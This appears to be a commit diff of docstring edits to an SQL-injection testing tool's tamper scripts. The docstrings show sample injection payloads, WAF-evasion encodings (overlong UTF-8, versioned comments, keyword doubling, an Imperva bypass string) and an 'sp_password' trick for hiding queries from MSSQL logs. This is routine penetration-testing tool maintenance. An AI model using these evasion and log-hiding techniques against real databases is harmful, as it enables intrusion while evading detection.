Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart
Requirement: Requirement:
* MySQL * MySQL

View File

@@ -19,7 +19,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces all occurrences of operator equal ('=') with operator 'LIKE' Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart
Tested against: Tested against:
* Microsoft SQL Server 2005 * Microsoft SQL Server 2005

View File

@@ -14,7 +14,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Slash escape quotes (' and ") Slash escape single and double quotes (e.g. ' -> \')
>>> tamper('1" AND SLEEP(5)#') >>> tamper('1" AND SLEEP(5)#')
'1\\\\" AND SLEEP(5)#' '1\\\\" AND SLEEP(5)#'

View File

@@ -21,7 +21,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Adds versioned MySQL comment before each keyword Adds (MySQL) versioned comment before each keyword
Requirement: Requirement:
* MySQL < 5.1 * MySQL < 5.1

View File

@@ -16,7 +16,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
HTML encode (using code points) all non-alphanumeric characters HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> &#39;)
>>> tamper("1' AND SLEEP(5)#") >>> tamper("1' AND SLEEP(5)#")
'1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;' '1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'

View File

@@ -14,7 +14,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart
Requirement: Requirement:
* MySQL * MySQL

View File

@@ -14,7 +14,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart
Requirement: Requirement:
* MySQL * MySQL

View File

@@ -13,7 +13,7 @@ __priority__ = PRIORITY.NORMAL
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Add a comment to the end of all occurrences of (blacklisted) "information_schema" identifier Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier
>>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES') >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES' 'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'

View File

@@ -17,7 +17,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces each keyword character with lower case value Replaces each keyword character with lower case value (e.g. SELECT -> select)
Tested against: Tested against:
* Microsoft SQL Server 2005 * Microsoft SQL Server 2005

View File

@@ -19,7 +19,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Embraces complete query with versioned comment Embraces complete query with (MySQL) versioned comment
Requirement: Requirement:
* MySQL * MySQL

View File

@@ -18,7 +18,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Embraces complete query with zero-versioned comment Embraces complete query with (MySQL) zero-versioned comment
Requirement: Requirement:
* MySQL * MySQL

View File

@@ -18,7 +18,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Adds multiple spaces around SQL keywords Adds multiple spaces (' ') around SQL keywords
Notes: Notes:
* Useful to bypass very weak and bespoke web application firewalls * Useful to bypass very weak and bespoke web application firewalls

View File

@@ -15,8 +15,7 @@ __priority__ = PRIORITY.NORMAL
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
-    Replaces predefined SQL keywords with representations
-    suitable for replacement (e.g. .replace("SELECT", "")) filters
+    Replaces predefined SQL keywords with representations suitable for replacement filters (e.g. SELECT -> SELSELECTECT)
Notes: Notes:
* Useful to bypass very weak custom filters * Useful to bypass very weak custom filters

View File

@@ -16,10 +16,11 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
-    Converts all (non-alphanum) characters in a given payload (not processing already encoded)
+    Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7)

-    Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
-    Reference: https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/
+    Reference:
+        * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
+        * https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1' 'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1'
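Worked example of the overlong-UTF8 math behind this tamper and the one in the next file: a 7-bit character is padded into a two-byte (technically invalid) sequence that lenient decoders still map back to the original byte:

def overlong(ch):
    code = ord(ch)                     # works for 7-bit (ASCII) input
    return "%%%.2X%%%.2X" % (0xC0 + (code >> 6), 0x80 + (code & 0x3F))

# overlong("'") == "%C0%A7" and overlong(" ") == "%C0%A0", matching the docstring examples above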

View File

@@ -16,10 +16,11 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
-    Converts all characters in a given payload (not processing already encoded)
+    Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94)

-    Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
-    Reference: https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/
+    Reference:
+        * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
+        * https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1' '%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1'

View File

@@ -18,7 +18,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Adds a percentage sign ('%') infront of each character Adds a percentage sign ('%') infront of each character (e.g. SELECT -> %S%E%L%E%C%T)
Requirement: Requirement:
* ASP * ASP

View File

@@ -20,7 +20,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces plus ('+') character with function CONCAT() Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart
Tested against: Tested against:
* Microsoft SQL Server 2012 * Microsoft SQL Server 2012

View File

@@ -20,7 +20,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces plus ('+') character with ODBC function {fn CONCAT()} Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart
Tested against: Tested against:
* Microsoft SQL Server 2008 * Microsoft SQL Server 2008

View File

@@ -18,7 +18,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces each keyword character with random case value Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
Tested against: Tested against:
* Microsoft SQL Server 2005 * Microsoft SQL Server 2005

View File

@@ -15,7 +15,7 @@ __priority__ = PRIORITY.LOW
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Add random comments to SQL keywords Add random inline comments inside SQL keywords (e.g. SELECT -> S/**/E/**/LECT)
>>> import random >>> import random
>>> random.seed(0) >>> random.seed(0)

View File

@@ -14,11 +14,10 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
-    Appends special crafted string
+    Appends special crafted string for bypassing Imperva SecureSphere WAF

-    Notes:
-        * Useful for bypassing Imperva SecureSphere WAF
-        * Reference: http://seclists.org/fulldisclosure/2011/May/163
+    Reference:
+        * http://seclists.org/fulldisclosure/2011/May/163
>>> tamper('1 AND 1=1') >>> tamper('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'" "1 AND 1=1 and '0having'='0having'"

View File

@@ -11,7 +11,7 @@ __priority__ = PRIORITY.HIGH
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
Requirement: Requirement:
* MSSQL * MSSQL

Some files were not shown because too many files have changed in this diff